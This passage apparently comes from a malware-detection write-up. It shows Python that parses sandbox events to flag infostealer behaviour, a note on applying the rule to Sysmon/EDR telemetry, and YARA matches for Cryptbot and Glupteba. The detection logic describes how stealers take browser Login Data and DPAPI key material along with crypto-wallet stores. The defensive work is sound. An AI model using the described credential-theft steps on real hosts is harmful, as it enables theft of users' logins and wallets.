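        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        image, event = PureWindowsPath(m["proc"]).name, m["event"].strip()
        detail = re.sub(r"\s*Jump to behavior$", "", m["detail"]).strip()
        if image.lower() in BROWSER_IMAGES:
            continue  # a browser reading its own profile is expected
        p = detail.lower()
        if event == "File opened":
            name = PureWindowsPath(p).name
            if "\\user data\\" in p and name in CHROME_ARTIFACTS:
                out[image]["browser_artifacts"].add(name)
            elif name == "profiles.ini" and "\\mozilla\\firefox\\" in p:
                out[image]["browser_artifacts"].add("firefox profiles.ini")
            ext = EXT_ID_RE.search(p)
            if ext:
                out[image]["extensions"][ext.group(1)] = KNOWN_WALLET_EXTENSIONS.get(ext.group(1), "unmapped")
        elif event == "Queries volume information":
            staged = STAGED_COPY_RE.search(re.sub(r"\s+volumeinformation$", "", p))
            if staged:
                out[image]["staged_copies"].add(staged.group(1))
        elif event == "String found in binary or memory":
            if any(marker in p for marker in WALLET_DIR_MARKERS):
                out[image]["wallet_dirs"].add(detail)
    return dict(out)


def is_stealer(record):
    """Credential files read by a non-browser, plus at least one of: wallet
    extension stores, wallet directories in strings, or browser DB copies in Temp."""
    return bool(record["browser_artifacts"]) and bool(
        record["extensions"] or record["wallet_dirs"] or record["staged_copies"])


if __name__ == "__main__":
    for image, record in summarize(SAMPLE_EVENTS).items():
        print(image, "stealer" if is_stealer(record) else "benign", record)
```

On a live host the same logic maps onto file-access telemetry (Sysmon FileCreate/FileCreateStreamHash or an EDR's file-open events) with the process image as the pivot; the "browser reads its own profile" exclusion is what keeps the rule quiet, and the default_key.bin copy is worth singling out because it is the DPAPI-protected key material that makes the copied Login Data usable off-box.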

Remote Access Functionality:

Yara detected Cryptbot
Source: Yara match File source: 0.2.7yyqdBJVGf.exe.3080e50.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.7yyqdBJVGf.exe.30d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7yyqdBJVGf.exe.3080e50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7yyqdBJVGf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.7yyqdBJVGf.exe.30d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7yyqdBJVGf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.316198160.0000000003080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.251202902.00000000030D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR
Yara detected Glupteba
Source: Yara match File source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR